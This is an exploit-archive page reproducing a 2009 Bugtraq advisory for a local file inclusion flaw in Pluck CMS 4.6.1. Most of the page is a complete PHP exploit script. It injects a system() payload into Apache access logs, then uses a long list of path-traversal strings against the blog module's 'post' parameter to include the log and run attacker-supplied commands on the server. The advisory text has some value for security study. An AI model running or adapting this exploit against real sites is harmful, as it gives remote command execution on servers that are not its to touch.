|
Feeds -
Exploits
|
|
Written by Alfons Luja
|
|
Tuesday, 24 March 2009 21:30 |
Pluck 'module_pages_site.php' Parameter Local File Include Vulnerability
-\\Bugtraq ID:
34207
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 23 2009 12:00AM
-\\Updated:
Mar 24 2009 07:06PM
-\\Credit:
Alfons Luja
-\\Vulnerable:
Pluck Pluck 4.6.1
-\\Discussion
Pluck is prone to a local file-include vulnerability because it fails to properly sanitize
user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information
and execute arbitrary local scripts in the context of the webserver process. This may allow
the attacker to compromise the application and the underlying computer; other attacks are
also possible.
Pluck 4.6.1 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
Attackers can exploit this issue via a browser.
The following exploit code is available:
===============================================================
34207.php
^^^^^^^^^^
<?php
/*
pluck v 4.6.1 LFI exploit
autor : Alfons Luja
Vuln is in \data\modules\blog\module_pages_site.php
...
$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
//Check if post exists, and include information
if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
include('data/settings/modules/blog/posts/'.$_GET['post']);
$module_page['viewpost'] = $post_title;
}
}
...
Nothing to comment ;x
Greetings: For all friends and obvious for me ;D
if($argc < 4) die("Use host path command [www.example.com /pluck ls l]\n");
set_time_limit(0);
error_reporting(0);
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];
//add something if not w00rking ;x
$shell = array(
"<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/access.log",
"../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../../apache/logs/access.log",
"../var/log/httpd/access.log",
"../../var/log/httpd/access.log",
"../../../var/log/httpd/access.log",
"../../../../var/log/httpd/access.log",
"../../../../../var/log/httpd/access.log",
"../../../../../../var/log/httpd/access.log",
"../../../../../../../var/log/httpd/access.log",
"../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../../var/log/httpd/access.log",
"../var/log/apache/access.log",
"../../var/log/apache/access.log",
"../../../var/log/apache/access.log",
"../../../../var/log/apache/access.log",
"../../../../../var/log/apache/access.log",
"../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../var/log/apache/access.log",
"../usr/local/apache2/logs/access.log",
"../../usr/local/apache2/logs/access.log",
"../../../usr/local/apache2/logs/access.log",
"../../../../usr/local/apache2/logs/access.log",
"../../../../../usr/local/apache2/logs/access.log",
"../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../../usr/local/apache2/logs/access.log",
);
function _hdr($int){ //Mia�o nie by� file_get_contents
global $shell,$host,$path;
$header .= "GET /$host/$path/$shell[$int] HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .= "Accept-Language: en-us,en;q=0.5\r\n";
$header .= "Accept-Encoding: gzip,deflate\r\n";
$header .= "Connection: close\r\n\r\n";
return $header;
}
function _inject($hosts,$ports){
$hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
if(!$hnd) die("Injection errr $errstr\n");
fwrite($hnd,_hdr(0));
fclose($hnd);
}
function _result($data){
$ret = explode(' e[Ho_trip ',$data);
if($ret[1] != ""){
for($i = 1;$i<count($ret);$i++){
$ret_2 = explode(' d34th_trip',$ret[$i]);
if($i - count($ret) == -1){
if($ret_2[0] != ""){
echo($ret_2[0]);
} else {
die("Exploit failed!!\n");
}
}
}
}
}
function _exploit($hosts,$paths){
global $shell;
$rets = "";
$count = count($shell);
for($i=1;$i<$count;$i++){
$tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?
post=$shell[$i]");
_result($tab);
}
}
echo("---- pluck v 4.6.1 -----\n\n".
"Autor: Alfons Luja\n".
"Target: $host\n".
"Path: $path\n".
"Port: $port\n".
"COM: $command\n".
"Ex: poc.php www.example.com 80 pluck \"dir\"\n\n");
_inject($host,$port);
_exploit($host,$path);
?>
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are
aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Pluck Homepage
http://www.pluck-cms.org (Pluck)
|
|
